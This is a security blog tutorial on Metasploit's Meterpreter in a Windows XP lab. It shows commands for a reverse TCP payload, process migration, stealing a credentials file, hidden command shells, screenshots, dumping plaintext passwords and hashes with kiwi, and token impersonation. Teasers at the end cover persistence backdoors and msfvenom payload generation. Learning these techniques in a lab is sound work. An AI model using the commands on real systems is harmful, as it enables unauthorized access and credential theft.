Meterpreter - Metasploit Part 3

-

                           Meterpreter

So we've got the reverse shell back already in the previous blog and now what are we here for ?!

But do you think a reverse shell is all we want from the target machine ? But think how dope it gonna be if we have features to downlaod a remote file from the target machine , dump hashes , passwords , take screenshots and many more

We humans want something more better and then after something even more better 

No matter what we breed we are still made of greed 

So I guess we could say that in a way Meterpreter is here to fuel our thirst



What the heck Meterpreter ?

Meterpreter is nothing but a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code. So its a advanced shell where we get access to tons of different modules instead of just cmd output and input.

Exploitation

Command : 

set payload windows/meterpreter/reverse_tcp

Fig : 1.0


In Fig : 1.0 we have set the meterpreter payload and talking about other settings , you know I know :)

Command : 

exploit -j

Fig : 1.1


We can see the meterpreter reverse shell session from the target machine in Fig : 1.1

Command : 

sessions -i 1

Fig : 1.2


In Fig : 1.2 we got the meterpreter session ! 

Now we are not kiddos who feel happy just cause we have exploited the machine and got a session back😤, we have to focus more on post-exploitation phase cause that's what real hackers do !

So do be a kiddo who dances for nothing

Someone in Metasploit Part-2 blog : 



Well people change you know 🙄

So the firstly let's list the processes on the remote machine 

Command : 

ps

Fig : 1.3



In Fig : 1.3 we have listed the processes on the target machine which is the same as tasklist command on windows

And I want you to notice that there isn't any meterpreter process running on the system ! . Well then what are we running on ?! . What process are we on the remote machine ? Am I just capping everyting ? 

Hell nooooo

What actually happens in the backend is that our meterpreter payload gets injected into a process called svchost.exe which has system level access

meterpreter is deployed using in-memory DLL injection which means that our payload is injected into an already existing process on the target machine instead of creating a new process which is done by some specific payloads which inturn may raise alarms on their network ! and so we could say that meterpreter help us overcome this drawback.

Let's see the process id of the process we are running on

Command : 

getpid

Fig : 1.4



In Fig : 1.4 we can see that our pid matches with the pid of svchost.exe which proves that our payload is injected into the process svchost.exe

And as the svchost.exe with pid 1020 has SYSTEM level authority (which we could see in the user coloumn) and so do we :) and if the process has user level access then we the attackers will also have user level access on the target machine

Things Noticed : 

The thing I have observed is that svchost.exe runs on the machine automatically as windows xp machine gets booted but If we end the process manually and then try to exploit the machine then we are not able to exploit it which means that svchost.exe must be running on the target machine inorder for us to exploit ! 

In case if you know how to overcome this feel free to comment down and share with the community

Migration

Now let's say that we are a team performing red team operations and I have got access to windows xp machine but for some reason you want to access the same windows machine as well like my brother who just wants what I have 🙃 . So will you be able to exploit the machine I have exploited ? Well it depends , you might sucessfully exploit the machine and inject your paylaod into the same svchost.exe but as the coin has two sides the process might crash as well , which just results in losing my session as well ! and to prevent that from happening I will simply migrate to any other process on the machine which basically means we inject ourselves into another process and get out of the process we were actually in and so I could welcome you :)

To migrate to other process 

Command : 

migrate PID

Fig : 1.5


In Fig : 1.5 I have migrated to a specific process called spoolsv.exe using the pid of it . keeping in mind that the process also runs automatically when the system gets booted and more importantly the process is also has system level authority

Downloading Files : 

Now let's just say that we wanted to download any file from the target machine.

Command : 

download 1 2

1 : Path for the file on the remote machine
2: Path for the file to be stored on the local machine

In my case I have downloaded a file named credentials.txt from the desktop of the user SaiNikhil and Stored the file in the current directory (denoted by .)

Fig : 1.6


In Fig : 1.6 you can refer to the action of downloading a file from the target machine

And we could cross check the contents in the files as well

Fig : 1.7



Now its time to check the file we have downloaded locally

Command : 

lcat FileName

where l denotes we are about to specify a local file

Fig : 1.8


In case if you don't know the path that pin points your location on the remote machine

Command : 

pwd

Fig : 1.9


If you don't know the location you are at in your local machine

Command : 

lpwd

Fig : 2.0


Editing files

Let's say you don't want to downlod the file but edit the file on the target machine 

Command : 

edit PathOfTheFile

Fig : 2.1


Fig : 2.2


In Fig : 2.2 we can see file loaded into the buffer and the edit command uses vim

So those who don't know how to use vim  : 

press i : you will get into insert mode from command mode and edit the file like you wanted to 

press esc : you will get back to command mode and now press shift+: (colon) and type wq and hit enter , your changes will be saved !

Fig : 2.3


In Fig : 2.3 we can see the changes I am going to make

Fig : 2.4


 And there you go you can see the changes reflected in Fig : 2.4

Uploading files

Now let's you wanted to upload files from the local machine

Command : 

upload 1 2

1 : Path for the file in the local machine you wanted to upload
2 : Path for the remote machine where you wanted the file to be uploaded

In my case I am uploading malware.txt file in my current directory to the desktop directory of the user Sainikhil

Fig : 2.5



Killing Processes

To kill processes on the target machine by name

pkill cmd.exe

To kill process on the target machine by pid

kill pid

Fig : 2.6


In Fig : 2.6 we have killed the cmd.exe process

Ways to get into cmd

Command :

shell

Fig : 2.7




In Fig : 2.7 using the command shell gave us the standard shell of the target machine which is nothing but command prompt and you can use exit command to come out of the cmd

But you shall also observe the thing that we are creating a new process on the target machine which means the user on the machine can find us if he/she lists view the processes running on the machine

Fig: 2.8

In Fig : 2.8 we can see that cmd process is running but no actual cmd process running on the machine isn't that fishy 🧐

Command :

execute -f cmd.exe -i -H

-f : the executable command to run
-i : interact with the process after it gets created
-H : create the process hidden from view

Fig : 2.9


We've got the shell in Fig : 2.9

Screenshot Capture 

To capture screenshots on the target machine

Command :

screenshot

Fig : 3.0


In Fig : 3.0 you can see the snapshot of the target machine is stored at the given path so lets see it

Fig : 3.1




In Fig : 3.1 we can see the snapshot that has been captured !

Meterpreter Modules :

Modules are just a piece of software that allows us to perform a specific task 

To see different type of modules we can load onto meterpreter

Commad :

load [tab]*2

just type load and press tab twice

Fig : 3.2


In Fig : 3.2 we can see the different type of available modules


Kiwi :

Now let's load one of the most popular module kiwi

Fig : 3.3


If you know nothing about kiwi module , it is a very use full module espacially when you want to get anything related to credentials related stuff such as stealing the passwords stored in the memory , dumping the hashes and much more

after loading the kiwi module just type

Command :

? or help [module_name]

Fig : 3.4


In Fig : 3.4 we can see a new section will commands related to the module has been added

To view all the creds loaded into the memory 

Command : 

creds_all

Fig : 3.5







In Fig : 3.5 you can see the hashes and even the passwords in plain text !! I don't know what to say , It is for real ? 



At this rate it doesn't matter how strong our password are ?! . However users must login so that the password is saved in the memory :)

Now we know how to load a meterpreter module and use it but let's try another module which isn't as cheesy as it sounds and yes I am talking about incognito module :)

Incognito :

Incognito module is use to steal tokens which allow us to impersonate other users on the system and if you want an in detail explanation about what are tokens and why do windows use it ? then I worte a blog on that as well to view it click here and I would highly recommend you to know how they work behind the scenes and I believe that these are the things that seperate us from script kiddies.

So load the incognito module as we have done with the kiwi

Now to list the tokens by user

Command :

list_tokens -u

Note :
You must have SYSTEM level access to view and impersonate tokens

Fig : 3.6



In Fig : 3.6 we can see different all the tokens we can steal from the processes memory

To steal the token of a particular user

Command :

impersonate_token [The_Name_Of_The_User]

Fig : 3.7


In Fig : 3.7 we can see that we have sucessfully impersonated the user Naruto

Now lets list the tokens again

Fig : 3.8


And there you go as we have discussed earlier we will not be able to list the tokens even user naruto has administrative privilages , so only SYSTEM level privilage come to the rescue here

So as meterpreter suggests we can perform the rev2self command to get back to our initial privilage which is SYSTEM privilage in our case

Command : 

rev2self

Fig  : 3.9


In Fig : 3.9 we can see that we have got to our initial privilage which is none othe than SYSTEM :)

Now there might be a doubt in your might that why do we even need to impersonate other users when we have the highest privilage ? and yes that's a real fair question , it helps us in many ways and one of the many reasons is that  when you need to access local file share that is only accessed by particular set of users

And Lets call it a day shall we ! 

we have explored over the meterpreter pretty well and I also expect you to try out other modules as well cause they are pretty interesting



---------------------------------------------------NOT THE END BUT A BREAK--------------------------------------------------------------

Comments

Post a Comment

Popular posts from this blog

Learning Nmap Host Discovery with iptables and Wireshark Analysis

-
Image
Learning Nmap Host Discovery with Iptables  and Wireshark Analysis Finally the wait is no longer , we are going to learn host discovery using nmap in a very detailed way. Well you might say that there are many videos and blogs out there what is special about this one ? , In this blog I will be sharing my knowledge after going through several videos , nmap book and many other blogs in the most detailed way possible , well you will see the difference after going through the blog . When I say I really mean it . Heads up !! you must know basis of iptables before going through the blog  and you might ask why ? coz we not just learning just by saying that nmap blocks the packets so this host discovery isn't going to work.  we are going to block the packets and run the discovery again and bypass the our rules ourselves that how this blog is designed very thing is practical practical and practical . How cool is that ?!. well I wrote blog on iptables just for you !! click here an...
Read more

Persistence Techniques with Metasploit - Part 6

-
Image
     Persistence Techniques with Metasploit Getting a shell in real world requries a lot of hardwork and research , All this work put in so that we will be ok to loose the session when the user logs off or turns the computer off ? Hell no ! , we need to make our connection persistance so that we can get back alive when the computer's on or when the user logs in. And we will be taking a look into the post module section which helps us to make our connection persistence after exploiting the target machine. Note : For creating a persistence backdoor you should have already compromised the target machine and have the meterpreter shell  Pov : you have already exploited the target machine and had a meterpreter shell Commands :  use exploit/windows/local/persistence_exe show options Fig : 1.1 In Fig : 1.1 we can see the different options availabe REXENAME option defines the name of the exe file the module is going to put on the remote system REXEPATH denotes the local ...
Read more

Generating Payloads using Msfvenom - Metasploit Part 5

-
Image
Generating and encoding Payloads using  Msfvenom Well aparantely msfvenom is a seperate tool from msfconsole which is used to generate payloads but it doesn't mean that we cannot create payloads using msfconsole but the advantage of using msfvenom is that there is no need for us to be in the msfconsole to generate payloads but no worries we will be covering both the methods :) So let's hop onto it shall we ! Command : msfvenom --list Fig : 1.1 In Fig : 1.1 we can see using the command we can list a brief instructions on how to use different options with it To list different types of modules we can use Command : msfvenom --list [modules] eg:payloads Fig : 1.2 In Fig : 1.2 we can see the different types of available payloads we can use with msfvenom and obviously it is going to take a while when you execute the command to load loads of payloads Let's create a meterpreter staged payload Command : msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=port_number -...
Read more